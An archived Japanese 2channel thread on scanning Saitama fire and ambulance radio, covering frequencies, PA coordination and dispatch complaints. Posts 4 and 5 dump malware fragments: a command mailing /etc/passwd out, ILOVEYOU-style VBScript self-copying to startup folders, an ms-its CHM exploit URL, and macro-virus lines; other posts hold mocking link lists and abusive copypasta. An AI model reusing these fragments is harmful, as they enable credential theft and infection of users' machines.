2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

埼玉消防救急

1 :名無しさんから2ch各局…:2006/12/01(金) 00:34:37
なんで無かったのか?
あってもイイジャナイカ。


2 :群馬消防救急 :2006/12/01(金) 00:45:18
97年9月から稼働し始めた当方自慢のホームページですが、ちょうど今年で満5年を迎え又
アクセスカウントも20万を超しアイピーを晒してK県に宣戦布告したという事を節目にバツが悪
いためにホームページを休止し致します。 思えば5年前にホームページを立ち上げたときは、
このように2ちゃんねるとアマチュア無線の融合が爆発的に流行るとは思えずダイヤルアップ接続に
特化した内容のモノも少なく、手探りで勤務中に会社から50Wの移動局を主な誹謗中傷の対
象としてカキコして参りました。この5年間続けられていたのもひとえに私をハケーンしに飲み会に来
て頂いたり無線板にネズラネタをカキコ頂いた方々のお陰と感謝の念で一杯です。職場での左遷
や愛犬の食費問題など公私共、今後さらなる金欠病が予測され、ダイヤルアップ接続料に費や
す資金が取れなくなるというのも休止の大きな原因です。夢であったP5の首領殿とアイボールも出
来、後はサダムフセイン残しということで、パケクラに個人コールでレポートする気力が衰えたのも事実
ですが・・・?!今ではトカチさんをはじめとする多くのDXER諸氏が常時接続回線を用いて個人ホー
ムページを立ち上げられて居られますし著名アイボールQSOクラブでも稼働させているところが多く有
ります。是非ともこういったホームページをご利用され、ご自身のカキコ向上に役立てられてください!
なお、当ホームページへのリンク張られていた方々、申し訳ないのですが削除を御願い致します。
この告知のページも経済的な理由により1ヶ月程度をメドに停止致します。本当に5年間当方自慢
のホームページをご利用頂き、ありがとうございました。
http://0bbs.jp/je1syn/
http://www.k2.dion.ne.jp/~t_ikeda/
http://blogs.dion.ne.jp/dxer/
http://page.freett.com/nickyama2/maebashi021.jpg
http://zumatsu.hp.infoseek.co.jp/2005Hamfair/IMGP00791.jpg
http://zumatsu.hp.infoseek.co.jp/2005Hamfair/IMGP00991.jpg
http://www001.upp.so-net.ne.jp/takahashi/photo/je1syn102.JPG
http://dxxxxx.hp.infoseek.co.jp/img040821/P10105971.jpg
http://tgc.jp-au.net/member.htm
http://543.teacup.com/tgc/bbs
http://www.maeko-hs.gsn.ed.jp/
http://www.k2.dion.ne.jp/~t_ikeda/LOVELOG_IMG/IMG_0273S.jpg

3 :名無しさんから2ch各局…:2006/12/01(金) 03:14:18
過疎ってるw

4 :名無しさんから2ch各局…:2006/12/01(金) 05:17:15
cat /etc/passwd | mail nobody@nonexistent.com
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.Copy^^^^File f1.path, f1.path+"l"
ms-its:mhtml:file://c:\ 
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

5 :名無しさんから2ch各局…:2006/12/01(金) 05:17:46
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)

6 :名無しさんから2ch各局…:2006/12/01(金) 05:19:02
P5のDXerだぁのお部屋

http://0bbs.jp/je1syn/

祖国の土を踏まぬ間に1972年3月から35年の歳月が経っていました。保存しておきたい将軍様の画像や資料などをこちらに掲載して参ります。
画像等について共和国の所有権を宣言致します、勝手に転載を禁止致しますが、ご利用の場合はメール等で焼き場まで連絡下さい。SYNOP。

http://www.k2.dion.ne.jp/~t_ikeda/
http://blogs.dion.ne.jp/dxer/
http://page.freett.com/nickyama2/maebashi021.jpg
http://zumatsu.hp.infoseek.co.jp/2005Hamfair/IMGP00791.jpg
http://zumatsu.hp.infoseek.co.jp/2005Hamfair/IMGP00991.jpg
http://www001.upp.so-net.ne.jp/takahashi/photo/je1syn102.JPG
http://dxxxxx.hp.infoseek.co.jp/img040821/P10105971.jpg
http://tgc.jp-au.net/member.htm
http://543.teacup.com/tgc/bbs
http://www.maeko-hs.gsn.ed.jp/

7 :名無しさんから2ch各局…:2006/12/01(金) 21:12:14
146.820ですね。


8 :名無しさんから2ch各局…:2006/12/01(金) 21:13:55
サルといかんざきとスケートブスのAAマダー?(・∀・ )っ/凵 ⌒☆チン

9 :名無しさんから2ch各局…:2006/12/02(土) 23:38:13
鬼はパラボラか八木を背負って下さい。
逃げる人は左手に携帯電話(にちゃん書き込み用)と右手にハンディ機を持ち、秋葉っぽい格好でお願いします。

逃げる人は、このスレに現在地と周波数を書き、その周波数で逐一どっち方面に逃げてるか連絡されたし。
範囲はさいたま市内です。

10 :名無しさんから2ch各局…:2006/12/03(日) 04:40:48
431.720で毎晩寅さんやってる件。
そして深夜はあえぎ声が聞こえてくる件。

11 :名無しさんから2ch各局…:2006/12/03(日) 22:46:01
寅さんやってる

12 :名無しさんから2ch各局…:2006/12/03(日) 23:24:57
>>7
その周波数、俺のC520で出せるんだが…
アマ無線バンドじゃなかったのか_| ̄|○

13 :名無しさんから2ch各局…:2006/12/03(日) 23:46:25
さいたま市消防って やたらチャンネルが多いのはなぜ?
つーか、市町村波が4つもあるの?

14 :名無しさんから2ch各局…:2006/12/04(月) 00:07:47
消防と消防救急と救急ってそれぞれ違うし。

15 :名無しさんから2ch各局…:2006/12/05(火) 00:43:07
http://ime.nu/pink.gazo-ch.net/bbs/27/img/200512/550933.jpg

16 :名無しさんから2ch各局…:2006/12/05(火) 08:08:19
夜中のカキコでまだこの位置(30)か
過疎だな

過疎ってるわりにスレ数多いんだよな。

17 :名無しさんから2ch各局…:2006/12/09(土) 23:27:05
>13
さいたま市の市波は基本的に浦和と大宮の2波づつを引き継いだ感じ
与野や岩槻は救急波と市波は返したしね
けど岩槻には県波と全国波は前進基地局として残してある
プラス市波と救急波も前進基地局として新設してある


18 :13:2006/12/10(日) 14:32:07
なるほど、合併によるものでしたか。

与野が全廃で、
岩槻は普段運用していないけど、新しい(旧浦和と旧大宮の)市波と救急波があるということですね。
ありがとうございまいた。

19 :名無しさんから2ch各局…:2006/12/10(日) 23:24:39
K市消防 S分署に新しい救急車が配備されたようだが、
なんと! この車両には 回転灯が1個も付いていないぞ。

20 :名無しさんから2ch各局…:2006/12/11(月) 14:48:58
さっき岩槻区、火事だった?救助活動だったの?

21 :名無しさんから2ch各局…:2006/12/11(月) 19:02:56
日勤多過ぎ!現場が最優先は当たり前。
事務所にいて 人手足りない・・・ て 変てこな言い訳してる
お偉方?

22 :名無しさんから2ch各局…:2006/12/24(日) 00:29:59
>>21
どういう状況での話しだ それは?

人手が足りないのはたしかだが。
某分署は隊員が消防隊・救急隊兼任で、
救急出場してしまうと、近くで火事が有っても消防車は有るが隊員がいなくて消防車が出せない。
消防隊が出場してしまうと、救急車は有るが隊員がいなくて救急車が出せない。
というところが有った。

23 :名無しさんから2ch各局…:2006/12/26(火) 23:14:33
日勤多過ぎ?何処の話?

24 :名無しさんから2ch各局…:2007/01/12(金) 00:37:02
>22
あちこちにそんなところあるね。
消防ポンプと救急が
隊員兼任のところ。

25 :名無しさんから2ch各局…:2007/01/12(金) 00:40:42
え?兼任て普通じゃないの??

26 :名無しさんから2ch各局…:2007/01/13(土) 23:33:50
専従が普通。

27 :名無しさんから2ch各局…:2007/01/30(火) 19:05:25
浦和で大規模火災発生中。
指令課パニック。

28 :名無しさんから2ch各局…:2007/01/30(火) 19:08:45
周波数いくつ?
浦和って何ch?

29 :名無しさんから2ch各局…:2007/01/30(火) 19:15:15
150.45

30 :名無しさんから2ch各局…:2007/01/30(火) 19:19:56
>>29
謝謝

31 :a奈奈BSD:2007/01/30(火) 19:21:44
<<<<<GE OVER POWER 万年煮海女痔自慰!>>>>>
匿名希望「M・O」より

32 :名無しさんから2ch各局…:2007/01/30(火) 19:49:32
で、どこが大規模だったん?
大規模の割には静かになるの早かったぞ

33 :名無しさんから2ch各局…:2007/01/30(火) 20:40:26
これか?


JR駅そばの民家で火災、京浜東北線など一時止まる
http://www.asahi.com/national/update/0130/TKY200701300366.html

34 :名無しさんから2ch各局…:2007/02/12(月) 00:06:40
>33
見に行ったけど、もう、ブルーシートが
かぶせてある。

まぁ、あれだけの御殿が2軒全焼したんだし、
隣接のマンションもベランダ一部焼けた
し、とにかく消防活動困難な場所だった。


35 :名無しさんから2ch各局…:2007/02/17(土) 12:13:29
保守


36 :名無しさんから2ch各局…:2007/02/23(金) 00:35:35
うちの会社が燃えたときはオフィス火災ってことで最初から第2出場がかかったらしい。
狭い道路から建屋を囲むように20台くらいの消防車が並んでいる様子は壮観だったそうだ。
俺は1日外出で、現場を見られなかった orz

37 :名無しさんから2ch各局…:2007/02/23(金) 00:45:28
八木用アマアンテナを使って東京無線の消防を受信してます
家人のとなりが受信機を使っているときに、洗濯機に雑音が入り洗濯できません。
洗濯機の向きに八木アンテナがあるようで、受信だらけで雑音出来ません。
どうしたら受信にクリアできるでしょうか?

38 :名無しさんから2ch各局…:2007/02/23(金) 01:19:43
>37
貴方を電波が発信源です。

39 :名無しさんから2ch各局…:2007/02/24(土) 22:44:25
さいたま消防って、第1 第2 第3で、
ポンプ車の出場は何台?

40 :名無しさんから2ch各局…:2007/02/28(水) 19:49:50
大宮消防署って建物改装中?

41 :名無しさんから2ch各局…:2007/03/08(木) 17:30:15
アマ用八木アンテナを使って東京消防の無線を受信してます。
となりの家人が洗濯機を使っているときに、アンテナが雑音を拾ってしまいクリアに受信できません。
八木アンテナの向きに洗濯機があり、雑音だらけで受信出来ません。
指向性の八木アンテナから無指向性のGPに変えたら雑音はなくなるのでしょうか?

42 :名無しさんから2ch各局…:2007/03/08(木) 17:45:05
うぜえコピペしているキサマ。
死ね 死ね 死ね 死ね 死ね 死ね 死ね
死んでしまえ 死んでしまえ 死んでしまえ 死んでしまえ
今すぐ死ね 今すぐ死ね 今すぐ死ね 今すぐ死ね
キサマは人間のクズだ 死ね 今すぐ死ね 生きてる価値無し死ね
死ね 死ね 早く死ね 今すぐ死ね 生きてるのが犯罪だ 死ね
死ね 死ね 死ね 死ね 死ね 死ね 死ね

以上をウザコピペの後にすぐに同じようにコピペすると
バランスが取れますので各位よろしくお願いいたします。

43 :名無しさんから2ch各局…:2007/03/23(金) 22:41:22
ちいたま消防ってどうよ。

44 :名無しさんから2ch各局…:2007/03/24(土) 11:20:02
しょせん、旧三都市の寄せ集め。
管轄している規模の割に、指令など体勢がヘボ。
同時多発事案数件で直ぐにパニクる。
移動がいくら呼んでも、指令が無線に出ないなんてザラ。
一言「入電(あるいは扱い)中、各局暫らく待て」って言えば良いのに。
それにも増して大隊長や現場指揮の無線運用ヘボ過ぎ。
ハンディで無理矢理送信、頭切れ、過変調ばかり。。。

45 :名無しさんから2ch各局…:2007/04/12(木) 01:39:13
さいたま市は、政令市の消防の中でも
まぁ、下から数えて・・・・
と思えてしまうところがいくつもあります。
在籍車両にしても、これといったものはないので、
せいぜい、支援車と浦和Rくらい・・・
もう少し、予算をつけて欲しい。
防火水槽の整備率も低いし・・・・

46 :名無しさんから2ch各局…:2007/05/09(水) 00:19:49
HOSYU

47 :名無しさんから2ch各局…:2007/05/09(水) 09:18:49
一人、噛みまくりのオサーン指令オペが居るw
女性オペの方が全然上手いwww

48 :名無しさんから2ch各局…:2007/06/19(火) 07:23:58
童貞の僕にも好きな人がいるんだが、
清純そうだけど夜はSEXしてるんだろうな・・

49 :名無しさんから2ch各局…:2007/07/22(日) 22:07:00
保守

50 :名無しさんから2ch各局…:2007/08/07(火) 21:24:56
相変わらず、移動・指令とも無線オペ下手糞だなぁ。
通常の火災(って誤報だけど)でコレかよ。
大規模災害起きたら、って考えると・・・ ガクブル。

栄○出動なら、さ○ら指揮1は、ハンディじゃなくて車載経由にしろよ。

指令も指令で、「さっくらっく、あ〜」ってなんだよwww

51 :名無しさんから2ch各局…:2007/08/07(火) 22:29:38
昨日の某市はすごかったぞ。
朝から救急波の通話量がやけに多いと思っていたら、ついに、
「ただいま救急取り扱いが飽和状態です。
今後 救急要請があった場合、消防隊に指令を出す場合があります」だって。

119番して救急車を呼んだつもりがポンプ車が来たら
呼んだ方はびっくりしてしまうな。

52 :名無しさんから2ch各局…:2007/08/08(水) 00:01:29
はぁ?
PA 連携って知ってる?

さいたま消防じゃ当たり前に行われてますが何か?
一時は、救急呼ぶと漏れなくポンプ車付いて来ましたが?

53 :名無しさんから2ch各局…:2007/08/08(水) 23:03:15
PA連携の出動基準

心配停止などの重症患者の場合。

高層建物や地下、体重が重いなどで搬出困難が予想される場合。

現場の近くの消防署の救急車が出動中の場合。

交通事故現場で交通量が多い道路など二次災害予防。

その他必要と救急隊長が判断した場合。


54 :名無しさんから2ch各局…:2007/08/08(水) 23:16:41
http://news22.2ch.net/test/read.cgi/owabiplus/1184006545/l50
↑まさにこれを防ぐためにPA連携はあるんだね。

55 :名無しさんから2ch各局…:2007/08/08(水) 23:17:22
http://www.tfd.metro.tokyo.jp/hp-sibuya/saigaitaiou/pa/newpage11.html
http://www.tfd.metro.tokyo.jp/libr/qa/qa_73.htm
http://www.net.pref.aomori.jp/misawa/section/syobo/html/PArenkei.htm


56 :名無しさんから2ch各局…:2007/08/09(木) 05:26:09
>>52
はぁ?
救急車(救急隊)の絶対数が足りない事態です。
PA連携もへったくれも有りませんが、 何か?

>一時は、救急呼ぶと漏れなくポンプ車付いて来ましたが?

救急車抜きで、ポンプ車だけ伺いますが、よろしくおながいしまつ。

57 :名無しさんから2ch各局…:2007/08/12(日) 00:15:25
さいたま発見
http://www.city.saitama.jp/cgi-bin/odb-get.exe?WIT_template=AC020046&WIT_oid=saitama::Contents::22887

他消防に比べると、広報の質が・・・w

58 :名無しさんから2ch各局…:2007/08/12(日) 11:01:35
ポンプ者だけでもないよりはましだろw

59 :名無しさんから2ch各局…:2007/08/13(月) 00:45:04
>>52
むれ馬県 太った市では まずバイクが伺いますが、 何か?
http://www.eandm.info/photo/2006/20060930oota/09.html

60 :名無しさんから2ch各局…:2007/08/19(日) 23:49:02
埼玉県熊谷市消防本部も赤バイクで伺います。

61 :名無しさんから2ch各局…:2007/08/20(月) 01:39:46
俺のスレがまだ生きてる。
俺はもう死ぬのに。

62 :名無しさんから2ch各局…:2007/09/01(土) 14:17:27
防災の日age

63 :名無しさんから2ch各局…:2007/09/01(土) 14:18:21
防災の日age・・w

64 :名無しさんから2ch各局…:2007/09/07(金) 13:22:06
埼玉航空ヘリ2キタ━━━━(゚∀゚)━━━━!!!!

65 :名無しさんから2ch各局…:2007/09/07(金) 13:53:40
埼玉県上尾市

17 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)